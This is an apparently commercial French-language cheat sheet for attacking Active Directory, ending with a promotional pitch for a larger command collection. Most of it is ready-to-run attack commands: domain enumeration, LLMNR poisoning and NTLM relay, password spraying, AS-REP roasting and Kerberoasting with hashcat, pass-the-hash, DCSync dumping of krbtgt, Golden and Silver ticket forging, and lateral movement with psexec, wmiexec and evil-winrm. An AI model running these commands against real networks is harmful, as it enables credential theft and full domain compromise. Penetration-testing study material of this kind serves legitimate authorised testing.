# Énumération du domaine
Cartographiez le domaine avant d'attaquer. NetExec (ex-CrackMapExec) et Impacket sont les chevaux de bataille. Commencez sans authentification, puis recommencez avec chaque identifiant récupéré.
nxc smb 10.10.10.0/24enum4linux-ng -A DC_IPnxc smb DC_IP -u '' -p '' --usersldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountNamenxc smb DC_IP -u user -p pass --sharesnxc smb DC_IP -u user -p pass --pass-polGetADUsers.py -all domain/user:pass -dc-ip DC_IP# BloodHound — cartographier les chemins vers DA
BloodHound trace le chemin d'attaque le plus court vers Domain Admin. Collectez les données, puis laissez le graphe planifier votre chaîne.
bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c allnxc ldap DC_IP -u user -p pass --bloodhound --collection-method all.\SharpHound.exe -c All# Empoisonnement LLMNR/NBT-NS & relais NTLM
Sans aucun identifiant, empoisonnez la résolution de noms pour capturer des hash NetNTLM — puis cassez-les ou relayez-les.
responder -I eth0 -wvhashcat -m 5600 hashes.txt rockyou.txtntlmrelayx.py -tf targets.txt -smb2supportntlmrelayx.py -t ldap://DC_IP --escalate-user user# Password Spraying
Testez un mot de passe courant sur tous les utilisateurs — restez sous le seuil de verrouillage récupéré dans la politique.
nxc smb DC_IP -u users.txt -p 'Saison2026!' --continue-on-successkerbrute passwordspray -d domain.local users.txt 'Welcome1'nxc smb DC_IP -u users.txt -p passwords.txt --no-bruteforce--pass-pol d'abord. Verrouiller des comptes est bruyant et perturbant — ne pulvérisez jamais à l'aveugle.# AS-REP Roasting
Les comptes sans pré-authentification Kerberos permettent de demander un AS-REP et de le casser hors ligne — parfois sans aucun identifiant.
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IPGetNPUsers.py domain/user:pass -request -dc-ip DC_IPhashcat -m 18200 asrep.txt rockyou.txt# Kerberoasting
Tout utilisateur authentifié peut demander des TGS pour les comptes SPN. Les mots de passe des comptes de service sont souvent faibles — cassez-les pour escalader.
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -requestnxc ldap DC_IP -u user -p pass --kerberoasting kerb.txthashcat -m 13100 kerb.txt rockyou.txt# Pass-the-Hash
Authentifiez-vous avec un hash NTLM au lieu d'un mot de passe — aucun cassage requis. La colonne vertébrale du mouvement latéral AD.
nxc smb CIBLE -u Administrator -H aad3b435b51404ee:HASHevil-winrm -i CIBLE -u Administrator -H HASHpsexec.py -hashes :HASH Administrator@CIBLEsecretsdump.py -hashes :HASH Administrator@CIBLE# DCSync
Avec des droits de réplication, demandez à un contrôleur de domaine le hash de n'importe quel compte — dont krbtgt, la clé des Golden Tickets.
secretsdump.py domain/user:pass@DC_IPsecretsdump.py domain/user:pass@DC_IP -just-dc-user krbtgtnxc smb DC_IP -u user -p pass --ntds# Golden & Silver Tickets
Forgez des tickets Kerberos pour un contrôle total et persistant. Golden = TGT forgé (hash krbtgt). Silver = TGS forgé pour un service (hash du compte de service).
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local Administratorexport KRB5CCNAME=Administrator.ccache; psexec.py -k -no-pass domain.local/Administrator@DCticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/server Administrator# Mouvement latéral & shells
Déplacez-vous entre les hôtes avec les identifiants et tickets collectés.
| Outil | Accès | Notes |
|---|---|---|
| psexec.py | SYSTEM | Bruyant, crée un service — le plus détecté |
| wmiexec.py | Utilisateur | Semi-interactif, sans service (plus discret) |
| smbexec.py | SYSTEM | Aucun fichier déposé sur le disque |
| evil-winrm | Utilisateur | PowerShell complet — nécessite WinRM (5985) |
| atexec.py | SYSTEM | Exécute via une tâche planifiée |
wmiexec.py domain/user:pass@CIBLEevil-winrm -i CIBLE -u user -p passnxc smb CIBLES.txt -u user -p pass -x "whoami"❓ FAQ pentest Active Directory
L'énumération. Sans authentification, lancez responder pour capturer des hash et enum4linux-ng/nxc contre le domaine. Dès que vous avez des identifiants, collectez la surface d'attaque avec BloodHound.
Demander des TGS pour les comptes ayant un SPN. Le ticket est chiffré avec le hash du compte de service, cassé hors ligne avec hashcat -m 13100. Tout utilisateur du domaine peut les demander — attaque classique de faible vers haut privilège.
Le Kerberoasting vise les comptes SPN et casse le TGS (-m 13100). L'AS-REP roasting vise les comptes sans pré-auth Kerberos et casse l'AS-REP (-m 18200) — possible sans identifiants si vous connaissez un nom valide.
S'authentifier avec un hash NTLM au lieu d'un mot de passe en clair. Des outils comme nxc, evil-winrm et Impacket acceptent -H pour utiliser le hash directement — sans cassage.
Abuser de la réplication d'annuaire pour demander à un DC le hash de n'importe quel compte — dont krbtgt et les Domain Admins. Nécessite des droits de réplication ; secretsdump.py l'exécute à distance.
Un TGT forgé signé avec le hash krbtgt. Comme krbtgt signe chaque ticket, posséder son hash permet d'usurper n'importe qui (dont Domain Admin) indéfiniment — la persistance ultime. Récupérez d'abord le hash krbtgt via DCSync.
Il trace les chemins les plus courts vers Domain Admin à partir des données AD (utilisateurs, groupes, sessions, ACL). Collectez avec SharpHound ou bloodhound-python, puis lancez « Shortest Path to Domain Admins ».
NetExec (ex-CrackMapExec), Impacket (secretsdump, GetUserSPNs, psexec, ntlmrelayx), Responder, BloodHound, evil-winrm et hashcat. La plupart sont fournis avec Kali Linux.
📚 Ressources liées
- Cheatsheet Élévation de privilèges Linux — 80+ techniques pour les hôtes Linux rencontrés dans le domaine
- Cheatsheet Nmap — Trouver d'abord le contrôleur de domaine et ses services 88/389/445
- Cheatsheet OSCP — L'examen OSCP+ inclut désormais un ensemble Active Directory complet
- Glossaire du pentest — Kerberos, NTLM, SPN, TGT et 60+ termes clés définis
Transformez votre compromission AD en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité.
Envie des 12 020+ commandes ?
Cette cheatsheet AD n'est qu'une branche de la carte. Pentest Mindmap organise 12 020+ commandes en 34 catégories — de la recon à la post-exploitation — avec recherche instantanée et copie en un clic.
Commencer gratuitement →